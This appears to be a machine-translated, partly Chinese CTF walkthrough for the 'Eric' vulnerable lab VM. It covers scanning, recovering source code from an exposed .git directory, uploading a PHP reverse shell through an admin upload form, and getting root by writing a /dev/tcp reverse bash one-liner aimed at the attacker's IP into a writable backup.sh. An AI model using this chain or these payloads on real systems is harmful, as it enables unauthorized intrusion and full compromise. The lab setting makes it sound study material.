Eric target penetration test complete tutorial

环境准备

Coupon is not connected to the Internet doesn't matter,Mainly is to be in the same network segment

• 靶机：Eric

• 攻击机：Kali (192.168.56.102)

渗透目标

• Get a regular user offlag

• 拿到root用户下的flag

渗透测试实战

Known drone and ourKaliA virtual machine with the same network segment,现在先用nmapScanning the network segment,得到Eric的IP地址
nmap -sF 192.168.56.0/24

Here you can seeEric靶机的IP是192.168.56.101

And find it80端口是开着的,(22端口是ssh不用管),Directly in the browser to access the

很明显,Blog还没有开发完成

At this time to get site directory,枚举一下dirb http://192.168.56.101

Can be found as above three sensitive directory is we are interested in

访问admin.phpThere will be a login interface,But there is no blasting out.....

访问upload无权限

It is important to note at this time there.git敏感目录,With this as the breakthrough point in here,Use the following tool bosses,通过泄露的.git文件夹下的文件,重建还原工程源代码

GitTools：https://github.com/internetwache/GitTools

GitHack：https://github.com/lijiejie/GitHack

在这里使用的是GitHack

git clone https://github.com/lijiejie/GitHack.git
cd GitHack

运行pyFile reconstruct site code

python GitHack.py http://192.168.56.101/.git/

Direct look at thesephpWhat is the file

Then where can find thatadmin.phpIn the account and password

Try direct directly with the account and password loginhttp:192.168.56.101/admin.php

Can be found to be a successful login

Can be found that it is a upload file after login web site,This obviously can to uploadshell

To construct ashell,也可以用kali自带的

这里使用kali自带的

cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/test.php

需要修改一下ip/port(为kali本机地址)

vim test.php

保存后,kaliAgain a listen,这里的1234为上面test.php设置的port

nc -nlvp 1234

And then the modified directly to theshellAfter the login interface uploadedtest.php

Browse...选择shell,Upload点击上传

Will upload file path for the current target site/upload/目录下

In the browser to directly access theshell即可,

http://192.168.56.101/upload/test.php

So you can find a reboundshell成功了

接下来在ncWindow with a command directly to/home/eric/目录下,用ls -laLook at the file and file permissions

可以发现其中有flag.txt,这就是我们的目标

同时发现backup.shThere is something wrong with the configuration access,Obviously it can write scripts used to mention right,Will powerroot就用它了

Here to get a regular user offlag就行

cd /home/eric
ls -la
cat flag.txt

Here is got under the normal user rightsflag了,还差root用户下的

先看一下backup.shWhat is the file content

Can be found that it is compressed package site directory,This directly modifysh文件就行

在kali中用msfTool to print ashellScript to use(lhost为kali的IP,lport随便即可)

msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.102 lport=1235 A

Take this scriptecho到backup.sh

echo "bash -c '0<&78-;exec 78<>/dev/tcp/192.168.56.102/1235;sh <&78 >&78 2>&78'">backup.sh

然后kaliThis machine is a listeningnc -nlvp 1235(1235为上面msf设置的lport)

然后直接运行sh文件./backup.sh,这样就提权成功了

直接cat flag.txt看一下root下的flag就行

这里就拿到了ROOT用户权限下的flag了

完结,撒花***